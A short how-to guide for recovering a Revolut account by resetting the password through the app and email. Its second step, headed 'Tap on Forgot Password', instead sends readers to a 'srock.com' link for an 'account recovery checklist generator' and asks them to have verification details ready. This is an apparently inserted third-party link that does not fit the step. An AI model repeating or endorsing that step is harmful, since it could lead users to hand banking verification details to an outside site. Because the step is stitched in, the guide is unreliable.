If you find yourself locked out of your Revolut account and need to reset your login credentials, follow these steps to regain access. Step 1. Open the Revolut app. Launch the Revolut app on your mobile device. Ensure you have a stable internet connection to proceed with the login reset process. Step 2. Tap on Forgot Password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your email address. Input the email address associated with your Revolut account. Make sure it is the correct email to receive the recovery instructions. Step 4. Check your email. Look for an email from Revolut in your inbox. This email will contain a link or instructions to reset your password. If you don't see it, check your spam or junk folder. Step 5. Follow the reset instructions. Click on the link provided in the email and follow the prompts to create a new password. Once completed, return to the app and log in with your new credentials. If you encounter any issues during this process, consider reaching out to Revolut's customer support for further assistance.